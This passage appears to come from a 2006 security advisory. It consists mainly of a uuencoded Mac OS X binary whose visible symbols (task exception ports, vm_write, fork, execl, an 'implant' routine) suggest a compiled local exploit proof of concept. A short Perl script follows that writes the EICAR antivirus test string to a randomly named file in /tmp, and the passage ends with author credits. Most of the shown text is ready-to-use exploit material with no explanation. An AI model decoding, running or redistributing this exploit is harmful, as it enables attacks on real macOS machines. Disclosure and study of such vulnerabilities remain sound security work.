M```+;@``"YP```!Y````=````&L```!O````;@```'````![````<P```'(`
M``!Q````=0```(0```"#````>````($```"%````?0```'H```""````?P``
M`'X```!Y````=````&L```!O````;@```'````![````<P```'(```!Q````
M=0```(0```"#````>````($```"%````?0```'H```""````?P```'X```!V
M````;0```'P```!L````=P```(``````7TY807)G8P!?3EA!<F=V`%]?7W!R
M;V=N86UE`%]?9'EL9%]F=6YC7VQO;VMU<`!?7V1Y;&1?:6YI=%]C:&5C:P!?
M7W-T87)T`%]E;G9I<F]N`&1Y;&1?<W1U8E]B:6YD:6YG7VAE;'!E<@!S=&%R
M=`!?7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F<F%M95]I;F9O`%]?7VME
M>6UG<E]D=V%R9C)?<F5G:7-T97)?<V5C=&EO;G,`7U]C<&QU<U]I;FET`%]?
M8W1H<F5A9%]I;FET7W)O=71I;F4`7U]M:%]E>&5C=71E7VAE861E<@!?7V]B
M:F-);FET`%]A=&5X:70`7V-A=&-H7V5X8V5P=&EO;E]R86ES90!?8V%T8VA?
M97AC97!T:6]N7W)A:7-E7W-T871E`%]C871C:%]E>&-E<'1I;VY?<F%I<V5?
M<W1A=&5?:61E;G1I='D`7V-L;V-K7V%L87)M7W)E<&QY`%]D;U]M86-H7VYO
M=&EF>5]D96%D7VYA;64`7V1O7VUA8VA?;F]T:69Y7VYO7W-E;F1E<G,`7V1O
M7VUA8VA?;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?;6%C:%]N;W1I9GE?<V5N
M9%]O;F-E`%]D;U]S97%N;W-?;6%C:%]N;W1I9GE?9&5A9%]N86UE`%]D;U]S
M97%N;W-?;6%C:%]N;W1I9GE?;F]?<V5N9&5R<P!?9&]?<V5Q;F]S7VUA8VA?
M;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?<V5Q;F]S7VUA8VA?;F]T:69Y7W-E
M;F1?;VYC90!?97)R;F\`7V5X:70`7VUA8VA?:6YI=%]R;W5T:6YE`%]M86EN
M`%]R96-E:79E7W-A;7!L97,`7U]?:V5Y;6=R7V=L;V)A;`!?7V1Y;&1?<F5G
M:7-T97)?9G5N8U]F;W)?861D7VEM86=E`%]?9'EL9%]R96=I<W1E<E]F=6YC
M7V9O<E]R96UO=F5?:6UA9V4`7U]I;FET7VME>6UG<@!?7VME>6UG<E]G971?
M86YD7VQO8VM?<')O8V5S<W=I9&5?<'1R`%]?:V5Y;6=R7W-E=%]A;F1?=6YL
M;V-K7W!R;V-E<W-W:61E7W!T<@!?86)O<G0`7V-A;&QO8P!?9G)E90!?97AC
M7W-E<G9E<@!?97AE8VP`7V9O<FL`7VUA8VA?;7-G7W-E<G9E<E]O;F-E`%]M
M86-H7W!O<G1?86QL;V-A=&4`7VUA8VA?<&]R=%]I;G-E<G1?<FEG:'0`7VUA
M8VA?=&%S:U]S96QF7P!?<V5T<FQI;6ET`%]T87-K7W-E=%]E>&-E<'1I;VY?
M<&]R=',`7W9M7V%L;&]C871E`%]V;5]W<FET90!?=V%I=`!S=&%R="YS`&EN
M=#IT,3UR,3LM,C$T-S0X,S8T.#LR,30W-#@S-C0W.P!C:&%R.G0R/7(R.S`[
M,3(W.P``+U-O=7)C94-A8VAE+T-S=2]#<W4M-#8O`"]3;W5R8V5#86-H92]#
M<W4O0W-U+30V+V-R="YC`&=C8S)?8V]M<&EL960N`%]P;VEN=&5R7W1O7V]B
M:F-);FET`%]P;VEN=&5R7W1O7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F
M<F%M95]I;F9O`%]S=&%R=#I&*#`L,2D]*#`L,2D`=F]I9#IT*#`L,2D`87)G
M8SI0*#`L,BD]<B@P+#(I.RTR,30W-#@S-C0X.S(Q-#<T.#,V-#<[`&%R9W8Z
M4"@P+#,I/2HH,"PT*3TJ*#`L-2D]<B@P+#4I.S`[,3(W.P!E;G9P.E`H,"PS
M*0!I;G0Z="@P+#(I`&-H87(Z="@P+#4I`&DZ<B@P+#(I`'`Z<B@P+#0I`'$Z
M<B@P+#,I`'1E<FTZ*#`L-BD]*B@P+#<I/68H,"PQ*0````!?7V-A;&Q?;6]D
M7VEN:71?9G5N8W,`7V-A;&Q?;6]D7VEN:71?9G5N8W,Z9B@P+#$I`'`Z*#`L
M-BD`````3EA!<F=C.D<H,"PR*0!.6$%R9W8Z1R@P+#,I`&5N=FER;VXZ1R@P
M+#,I`%]?<')O9VYA;64Z1R@P+#0I`&UA8VA?:6YI=%]R;W5T:6YE.D<H,"PX
M*3TJ*#`L.2D]9B@P+#(I`%]C=&AR96%D7VEN:71?<F]U=&EN93I'*#`L."D`
M<&]I;G1E<E]T;U]O8FIC26YI=#I3*#`L-BD`<&]I;G1E<E]T;U]?9&%R=VEN
M7V=C8S-?<')E<F5G:7-T97)?9G)A;65?:6YF;SI3*#`L-BD``&1Y;&1?;&%Z
M>5]S>6UB;VQ?8FEN9&EN9U]E;G1R>5]P;VEN=`!E<G)O<E]M97-S86=E`&1Y
M;&1?9G5N8U]L;V]K=7!?<&]I;G1E<@!?9&%R=VEN7W5N=VEN9%]D>6QD7V%D
M9%]I;6%G95]H;V]K`%]D87)W:6Y?=6YW:6YD7V1Y;&1?<F5M;W9E7VEM86=E
67VAO;VL`7W)L+C``7VEM<&QA;G0`````
`
end
rand-eicar.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
$test = rand($i);   # $i is never set here, so rand(0) behaves like rand(1): names such as 0.928...
open(OP,">/tmp/$test");
# Uh... this isn't eicar dumb ***... I should not have to break this line up.
# print rather than printf: the test string contains '%', which printf reads as a format.
# The backslash in "[4\PZX" and the final '$' must be escaped, or Perl drops the
# backslash and interpolates an (empty) variable $H, leaving a string that is not EICAR.
print OP "X5O!P" . "%@AP\[" . "4\\PZX" . "54(P^)" . "7CC)7\}" . "\$EICAR" .
  "-STANDARD-ANTIVIRUS-TEST-FILE" . "!\$H+H*";
print(";p;P;p;p");
ADDITIONAL INFORMATION
The information has been provided by K F
<mailto:kf_lists@xxxxxxxxxxxxxxxxxxx>.
The original article can be found at:
http://www.digitalmunition.com/DMA[2006-1031a].txt